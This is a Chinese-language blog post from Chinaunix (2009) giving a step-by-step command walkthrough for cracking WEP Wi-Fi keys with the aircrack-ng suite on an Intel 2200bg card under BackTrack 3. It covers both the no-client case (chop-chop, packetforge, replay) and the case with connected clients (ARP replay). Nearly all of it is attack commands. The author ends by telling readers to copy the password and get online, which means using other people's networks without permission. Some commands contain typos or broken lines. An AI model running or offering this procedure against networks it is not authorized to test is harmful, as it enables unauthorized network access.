Chinaunix首页 | 论坛 | 博客
  • 博客访问: 495029
  • 博文数量: 96
  • 博客积分: 6046
  • 博客等级: 准将
  • 技术积分: 908
  • 用 户 组: 普通用户
  • 注册时间: 2006-03-07 22:40
文章分类

全部博文(96)

文章存档

2009年(12)

2008年(18)

2007年(45)

2006年(21)

我的朋友

分类: 系统运维

2009-08-09 16:29:19

实现注入式破解无客户端wep

airmon-ng start eth1(电脑不同,接口有可能为eth0,下同)
modprobe ipw2200 rtap-iface=1
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
ifconfig eth1 up hw ether
airodump-ng --ivs -w 1 -c 6 eth1

aireplay-ng -4 -e APessid -a APmac -h -i rtap0 eth1
packetforge-ng -0 -a AP
mac -h -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-*.xor -w rap

其中,replay_dec-*.xor为你得到的xor文件的全称,可用ls命令查看,然后拷贝、粘贴过来,-w后面跟的tqp是文件名,可以随便选取。
aireplay-ng -2 -r rap eth1
(这个命令里的rap必须和上条命令里的rap一样)
aircrack-ng -n 64 *.ivs (*.ivs
可以通过ls命令查看,也可以直接输入*.ivs,此时,程序将分析你root文件夹里存储的所有ivs文件)

INTEL 2200bg实现注入式破解有客户端wep

1;打开窗口输入

rmmod ipw2200

modprobe ipw2200 rtap_iface=1

2;

iwconfig eth1 ap

iwconfig eth1 key s:fakekey

iwconfig eth1 mode managed

3;

fconfig eth1 up

ifconfig rtap0 up

4;

airodump-ng --channel --bssid -w dumpfile rtap0

这时你观察station下面是不是有对方的机器如果客户端有在上网那么station下面就会有对方的MAC,记下来。

5; 打开新的窗口输入

aireplay-ng --arpreplay -b -h <客户机的 MAC> -i rtap0 eth1

此时如果对方有客户端在上网那么DATA的数据会增加我刚才的情况是有客户端但是RXQ信号很弱差不多只有13左右10分钟才增加了300date不过10分钟后RXQ超过50接着DATA极速增加此时在第5步打开的窗口中ARP得到的数据也会同时增加。

6; 当DATA超过100000后,打开新的窗口,输入

aircrack-ng -z -b dumpfile*.cap

然后就大功告成,抄下密码,上网去吧,嘿嘿。

上面就是BT3光盘启动下,最简单的破解有客户端WEP的全部过程,如果信号好的话,估计也就10来分钟搞定。

Ps;上面命令中的< >是不需要的。

 

 

 

阅读(1413) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~